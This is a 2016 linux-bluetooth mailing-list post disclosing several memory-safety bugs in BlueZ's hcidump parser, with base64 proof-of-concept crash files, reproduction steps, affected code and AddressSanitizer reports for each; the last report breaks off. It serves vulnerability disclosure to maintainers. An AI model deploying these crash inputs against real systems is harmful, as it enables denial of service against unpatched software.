* multiple buffer overflows and out-of-bound reads
@ 2016-11-14 17:06 op7ic \x00
2016-11-15 9:18 ` Luiz Augusto von Dentz
0 siblings, 1 reply; 8+ messages in thread
From: op7ic \x00 @ 2016-11-14 17:06 UTC (permalink / raw)
To: linux-bluetooth
[-- Attachment #1: Type: text/plain, Size: 248 bytes --]
Hello list,
I have been playing with hcidump tool recently and came across
following bugs coming from either out-of-bound reads or buffer
overflows (see attached reports).
There are couple more I`m working on and will send these later.
Cheers,
[-- Attachment #2: amp_dump_chanlist_OOB.txt --]
[-- Type: text/plain, Size: 4520 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A out-of-bound read was identified in "amp_dump_chanlist" function in "tools/parser/amp.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAqBfcQ/6LNFQA0AgUgFwIXAAEAERkgAE8VAf///4AcBADrAAACANIAAAABAAA9PggAav8HAD4+
IAAp2RlAAKKA0zQ0AgAAAAEXAAEABf9WAAAAIBkFAAEQAAAANPVq/wcAPj4gACnZGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA09fECFw4CAAEAAH8VAADe////6EABANM9Pgj3gP8HAD4+
IAAp+BlAAKKA0xU0AgAA8wEyAAMABf9WAAAAIBkNAAEQXQAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACiatMnNAIAGgDTPT4IAID+/QA+PiAACvgAGR8AA9EBAD4A/wA4
GhAA
Affected code:
45 for (i = 0; i < num; i++) {
46 triplet = &chan_list->triplets[i];
47
48 p_indent(level+2, 0);
49
50 if (triplet->chans.first_channel >= 201) {
51 printf("Reg ext id %d reg class %d coverage class %d\n",
52 triplet->ext.reg_extension_id,
53 triplet->ext.reg_class,
54 triplet->ext.coverage_class);
55 } else {
56 if (triplet->chans.num_channels == 1)
57
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==27923==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x60600000eff6 at pc 0x4a8615 bp 0x792d80053ec0 sp 0x792d80053eb8
READ of size 1 at 0x60600000eff6 thread T0
#0 0x4a8614 in amp_dump_chanlist tools/parser/amp.c:50
#1 0x4a8d58 in amp_assoc_dump tools/parser/amp.c:97
#2 0x492df4 in a2mp_create_req tools/parser/l2cap.c:1183
#3 0x492df4 in l2cap_parse tools/parser/l2cap.c:1382
#4 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#5 0x479c9c in acl_dump tools/parser/hci.c:4041
#6 0x479c9c in hci_dump tools/parser/hci.c:4120
#7 0x4035d4 in parse tools/parser/parser.h:260
#8 0x4035d4 in read_dump tools/hcidump.c:425
#9 0x4035d4 in main tools/hcidump.c:810
#10 0x71c2389e7b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#11 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000eff6 is located 0 bytes to the right of 54-byte region [0x60600000efc0,0x60600000eff6)
allocated by thread T0 here:
#0 0x71c238dc573f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x4a50e7 in l2cap_dump tools/parser/l2cap.c:1581
#2 0x1f
SUMMARY: AddressSanitizer: heap-buffer-overflow tools/parser/amp.c:50 amp_dump_chanlist
Shadow bytes around the buggy address:
0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
=>0x0c0c7fff9df0: fa fa fa fa fa fa fa fa 00 00 00 00 00 00[06]fa
0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==27923==ABORTING
[-- Attachment #3: ba2str_OOB.txt --]
[-- Type: text/plain, Size: 5712 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was observed in "ba2str" function in "bluetooth.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
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
PhcEGjgA/+gDGj66AH8EAQASJD4+WBo+ug==
Affected code:
77 int ba2str(const bdaddr_t *ba, char *str)
78 {
79 return sprintf(str, "%2.2X:%2.2X:%2.2X:%2.2X:%2.2X:%2.2X",
80 ba->b[5], ba->b[4], ba->b[3], ba->b[2], ba->b[1], ba->b[0]);
81 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==19853==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f778 at pc 0x580ae5 bp 0x7342a57f5cf0 sp 0x7342a57f5ce8
READ of size 1 at 0x61b00001f778 thread T0
#0 0x580ae4 in ba2str lib/bluetooth.c:80
#1 0x43f407 in p_ba2str tools/parser/parser.h:159
#2 0x43f407 in extended_inq_result_dump tools/parser/hci.c:3512
#3 0x481246 in event_dump tools/parser/hci.c:3963
#4 0x481246 in hci_dump tools/parser/hci.c:4116
#5 0x4035d4 in parse tools/parser/parser.h:260
#6 0x4035d4 in read_dump tools/hcidump.c:425
#7 0x4035d4 in main tools/hcidump.c:810
#8 0x72dfc0e31b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#9 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f778 is located 28 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x72dfc120f73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow lib/bluetooth.c:80 ba2str
Shadow bytes around the buggy address:
0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00 04 fa fa fa[fa]
0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==19853==ABORTING
[-- Attachment #4: commands_dump_BO.txt --]
[-- Type: text/plain, Size: 4535 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "commands_dump" function in "tools/parser/csr.c" source file. The issue exist because "commands" array is overflowed by supplied parameter due to lack of boundary checks on size of the buffer from frame "frm->ptr" parameter. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAqEAAQACDNAAIEAg7/AAEQEJABgEUKAAAD6LcAIP4GhwH/5mB5f3ME2wABABYaPhI+uj66AGUE
WQApP0Y+hRo+ugADBP8AggUSEhISEgNwIOkGAQD/f84AGBo+uvwDBAED6D4+PlgAAR8AA+YBPj5I
Gj662AMEAQD/nAAAA+YBAAADBAEAEiPlAAEAPrrYAwQBAP9/AAAYGj4AABgBAQAzJD4+WP8ButgD
hAEHEj4+PTwaOroAAwQBADA+Pj5YAAEfAAMAAQA+AAQaOBo+uvgDBAEAZAA+Uxo+utgDBD4+WAAB
HwAD5gEAPpfT/wA=
Affected code:
143 static inline void commands_dump(int level, char *str, struct frame *frm)
144 {
145 unsigned char commands[64];
146 unsigned int i;
147
148 memcpy(commands, frm->ptr, frm->len);
149
150 p_indent(level, frm);
151 printf("%s: commands", str);
152 for (i = 0; i < frm->len; i++)
153 printf(" 0x%02x", commands[i]);
154 printf("\n");
155 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==20429==ERROR: AddressSanitizer: unknown-crash on address 0x7fc28f471400 at pc 0x570527 bp 0x7fc28f471250 sp 0x7fc28f471248
WRITE of size 69 at 0x7fc28f471400 thread T0
#0 0x570526 in commands_dump tools/parser/csr.c:148
#1 0x570526 in pskey_dump tools/parser/csr.c:284
#2 0x576cae in bccmd_dump tools/parser/csr.c:496
#3 0x57d48a in csr_dump tools/parser/csr.c:569
#4 0x482b5e in event_dump tools/parser/hci.c:3823
#5 0x482b5e in hci_dump tools/parser/hci.c:4116
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x71b152861b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
Address 0x7fc28f471400 is located in stack of thread T0 at offset 384 in frame
#0 0x5661ff in pskey_dump tools/parser/csr.c:239
This frame has 6 object(s):
[32, 38) 'b'
[96, 104) 'features'
[160, 168) 't'
[224, 242) 'addr'
[288, 344) 'tm'
[384, 448) 'commands' <== Memory access at offset 384 partially overflows this variable
HINT: this may be a false positive if your program uses some custom stack unwind mechanism or swapcontext
(longjmp and C++ exceptions *are* supported)
SUMMARY: AddressSanitizer: unknown-crash tools/parser/csr.c:148 commands_dump
Shadow bytes around the buggy address:
0x0ff8d1e86230: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff8d1e86240: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff8d1e86250: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
0x0ff8d1e86260: f2 f2 f2 f2 00 f4 f4 f4 f2 f2 f2 f2 00 00 02 f4
0x0ff8d1e86270: f2 f2 f2 f2 00 00 00 00 00 00 00 f4 f2 f2 f2 f2
=>0x0ff8d1e86280:[00]00 00 00 00 00 00 00 f3 f3 f3 f3 00 00 00 00
0x0ff8d1e86290: 00 00 00 00 00 00 00 00 00 00 00 00 f1 f1 f1 f1
0x0ff8d1e862a0: 00 f4 f4 f4 f2 f2 f2 f2 00 00 00 00 00 00 00 f4
0x0ff8d1e862b0: f3 f3 f3 f3 00 00 00 00 00 00 00 00 00 00 00 00
0x0ff8d1e862c0: f1 f1 f1 f1 06 f4 f4 f4 f2 f2 f2 f2 00 f4 f4 f4
0x0ff8d1e862d0: f2 f2 f2 f2 00 00 02 f4 f2 f2 f2 f2 00 00 00 00
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==20429==ABORTING
[-- Attachment #5: conf_opt_UaF.txt --]
[-- Type: text/plain, Size: 4817 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
A use-after-free was identified in "conf_opt" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAIl48QJQQEBIAEBAzyAJCQj0QAkJ6P9gEAkJAT0yAA6v8A/3+PfwAAAQABAAA9PggAav8HAD4+
IAAp2RlAAKKA0xU0AgAAAAEQAAEABf9WAAAAIBkCAAEQAAAANABq/wcAPj4gACnZGUAAooDTFTQC
AAAAARcAAQAF/1YAAAAgGQIAARAAAAA49fECFw4CAAEAAH8VAAD79v8AAEABANM9PggAgP8HAAU+
IAAp+BlAAKKA0xU0AgAA8wEyAAEABf//fxoAIBkCAAEQAAAANPXxAhcOAgABAAB/FQAAAAAAAABA
AQDTPT4IAID/BwA+PiAAKfgZQACigNMVNAIAGgDTPT4KAID/BwA+PiAAKfgAARAAAAAABQABAAA9
Pv//AAABFwABAAX/VgAA
Affected code:
636 static void conf_opt(int level, void *ptr, int len, int in, uint16_t handle,
637 uint16_t cid)
638 {
639 int indent = 0;
640 p_indent(level, 0);
641 while (len > 0) {
642 l2cap_conf_opt *h = ptr;
643
644 ptr += L2CAP_CONF_OPT_SIZE + h->len;
645 len -= L2CAP_CONF_OPT_SIZE + h->len;
646
647 if (h->type & 0x80)
648 printf("[");
649
650 if (indent++) {
651 printf("\n");
652 p_indent(level, 0);
653 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==27419==ERROR: AddressSanitizer: heap-use-after-free on address 0x60600000efd4 at pc 0x48d77a bp 0x72b7bc0bf2b0 sp 0x72b7bc0bf2a8
READ of size 1 at 0x60600000efd4 thread T0
#0 0x48d779 in conf_opt tools/parser/l2cap.c:644
#1 0x498a05 in conf_rsp tools/parser/l2cap.c:781
#2 0x498a05 in l2cap_parse tools/parser/l2cap.c:1256
#3 0x4a627f in l2cap_dump tools/parser/l2cap.c:1624
#4 0x479c9c in acl_dump tools/parser/hci.c:4041
#5 0x479c9c in hci_dump tools/parser/hci.c:4120
#6 0x4035d4 in parse tools/parser/parser.h:260
#7 0x4035d4 in read_dump tools/hcidump.c:425
#8 0x4035d4 in main tools/hcidump.c:810
#9 0x6f259422cb44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#10 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x60600000efd4 is located 20 bytes inside of 50-byte region [0x60600000efc0,0x60600000eff2)
freed by thread T0 here:
#0 0x6f259460a527 in __interceptor_free (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x54527)
#1 0x483696 in read_remote_version_complete_dump tools/parser/hci.c:3200
#2 0x483696 in event_dump tools/parser/hci.c:3902
#3 0x483696 in hci_dump tools/parser/hci.c:4116
previously allocated by thread T0 here:
#0 0x6f259460a73f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x58f374 in hci_uint2str lib/hci.c:100
#2 0x58f374 in lmp_vertostr lib/hci.c:675
SUMMARY: AddressSanitizer: heap-use-after-free tools/parser/l2cap.c:644 conf_opt
Shadow bytes around the buggy address:
0x0c0c7fff9da0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9db0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dc0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9dd0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9de0: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
=>0x0c0c7fff9df0: 00 00 06 fa fa fa fa fa fd fd[fd]fd fd fd fd fa
0x0c0c7fff9e00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c0c7fff9e40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==27419==ABORTING
[-- Attachment #6: l2cap_dump_BO.txt --]
[-- Type: text/plain, Size: 4304 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An buffer overflow was observed in "l2cap_dump" function in "tools/parser/l2cap.c" source file. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
BAAqBRkQAKLNFRU0AgIHFwIXAAEABRkgAAAANAI9WAY+uugDPj4+WBo6utgDBAEA/5wAADgaProA
AwQB
Affected code:
1570 }
1571
1572 if (!(fr = get_frame(frm->handle))) {
1573 fprintf(stderr, "Not enough connection handles\n");
1574 raw_dump(level, frm);
1575 return;
1576 }
1577
1578 if (fr->data)
1579 free(fr->data);
1580
1581 if (!(fr->data = malloc(dlen + L2CAP_HDR_SIZE))) {
1582 perror("Can't allocate L2CAP reassembly buffer");
1583 return;
1584 }
1585 memcpy(fr->data, frm->ptr, frm->len);
1586 fr->data_len = dlen + L2CAP_HDR_SIZE;
1587 fr->len = frm->len;
1588 fr->ptr = fr->data;
1589 fr->dev_id = frm->dev_id;
1590 fr->in = frm->in;
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==17644==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00001f75c at pc 0x79c51d04e792 bp 0x79f5616c33d0 sp 0x79f5616c2b90
READ of size 4294967295 at 0x61b00001f75c thread T0
#0 0x79c51d04e791 (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x2e791)
#1 0x4a52d2 in l2cap_dump tools/parser/l2cap.c:1585
#2 0x479c9c in acl_dump tools/parser/hci.c:4041
#3 0x479c9c in hci_dump tools/parser/hci.c:4120
#4 0x4035d4 in parse tools/parser/parser.h:260
#5 0x4035d4 in read_dump tools/hcidump.c:425
#6 0x4035d4 in main tools/hcidump.c:810
#7 0x79c51cc96b44 in __libc_start_main (/lib/x86_64-linux-gnu/libc.so.6+0x21b44)
#8 0x40529e (/opt/bluez/tools/hcidump+0x40529e)
0x61b00001f75c is located 0 bytes to the right of 1500-byte region [0x61b00001f180,0x61b00001f75c)
allocated by thread T0 here:
#0 0x79c51d07473f in malloc (/usr/lib/x86_64-linux-gnu/libasan.so.1+0x5473f)
#1 0x402f12 in read_dump tools/hcidump.c:288
#2 0x402f12 in main tools/hcidump.c:810
SUMMARY: AddressSanitizer: heap-buffer-overflow ??:0 ??
Shadow bytes around the buggy address:
0x0c367fffbe90: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbea0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbeb0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbec0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
0x0c367fffbed0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
=>0x0c367fffbee0: 00 00 00 00 00 00 00 00 00 00 00[04]fa fa fa fa
0x0c367fffbef0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf00: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
0x0c367fffbf30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
Shadow byte legend (one shadow byte represents 8 application bytes):
Addressable: 00
Partially addressable: 01 02 03 04 05 06 07
Heap left redzone: fa
Heap right redzone: fb
Freed heap region: fd
Stack left redzone: f1
Stack mid redzone: f2
Stack right redzone: f3
Stack partial redzone: f4
Stack after return: f5
Stack use after scope: f8
Global redzone: f9
Global init order: f6
Poisoned by user: f7
Contiguous container OOB:fc
ASan internal: fe
==17644==ABORTING
[-- Attachment #7: le_meta_ev_dump_OOB.txt --]
[-- Type: text/plain, Size: 4880 bytes --]
Machine: x86_64
OS: linux-gnu
Compiler: gcc
Compilation CFLAGS: -O0 -ggdb3 -fsanitize=address
Machine Type: x86_64-unknown-linux-gnu
BlueZ Version: 5.42
Release Status: release
Source: http://www.kernel.org/pub/linux/bluetooth/bluez-5.42.tar.xz
Description:
An out-of-bound read was observed in "le_meta_ev_dump" function in "tools/parser/hci.c" source file. This issue exist becuase 'subevent' which is used to read correct element from 'ev_le_meta_str' array is overflown. This issue can be triggered by processing a corrupted dump file and will result in hcidump crash. To replicate this issue use the attached sample below and execute the following command:
./tools/hcidump -a -r <PoC File>
PoC.file base64 encoded:
IAAQ/xjyQAToA4AEBAxbAJD//0kDAKSQIAAgAQb/yyIAgAAB/3+Pf0siSgABABI+Pj5YGj662AME
BwASPgBkPBo+ugADBAEAMD4+PkkAAR8AA+YBAD4IBBo+ABC62AMEAQAwPllVWAABHwAD5gEAPgAE
Gj5APv//AwQBAAU+Pj1YJz668AMEAQASPj4+WBo+utgDBAEA/38A6RcaProAAwQBABIkPj5YGj66
2BAEAQA7//+6AIMEAQASJD4fWAABAQA+HwQaPkA=
Affected code:
3659 static inline void le_meta_ev_dump(int level, struct frame *frm)
3660 {
3661 evt_le_meta_event *mevt = frm->ptr;
3662 uint8_t subevent;
3663
3664 subevent = mevt->subevent;
3665
3666 frm->ptr += EVT_LE_META_EVENT_SIZE;
3667 frm->len -= EVT_LE_META_EVENT_SIZE;
3668
3669 p_indent(level, frm);
3670 printf("%s\n", ev_le_meta_str[subevent]);
3671
3672 switch (mevt->subevent) {
3673 case EVT_LE_CONN_COMPLETE:
3674 evt_le_conn_complete_dump(level + 1, frm);
3675 break;
3676 case EVT_LE_ADVERTISING_REPORT:
3677 evt_le_advertising_report_dump(level + 1, frm);
3678 break;
3679 case EVT_LE_CONN_UPDATE_COMPLETE:
3680 evt_le_conn_update_complete_dump(level + 1, frm);
3681 break;
3682 case EVT_LE_READ_REMOTE_USED_FEATURES_COMPLETE:
3683 evt_le_read_remote_used_features_complete_dump(level + 1, frm);
3684 break;
3685 default:
3686 raw_dump(level, frm);
3687 break;
3688 }
3689 }
Repeat-By:
echo <above base64> > PoC.64
base64 -d PoC.b64 > PoC.file
valgrind ./tools/hcidump -a -r PoC.file
ASAN Report (bluez needs to compiled with -fsanitize=address for this):
==30076==ERROR: AddressSanitizer: global-buffer-overflow on address 0x0000005bd780 at pc 0x48701d bp 0x7d1fca13a5c0 sp 0x7d1fca13a5b8
READ of size 8 at 0x0000005bd780 thread T0
#0 0x48701c in le_meta_ev_dump tools/parser/hci.c:3670
#1 0x48701c in event_dump tools/parser/hci.c:3991
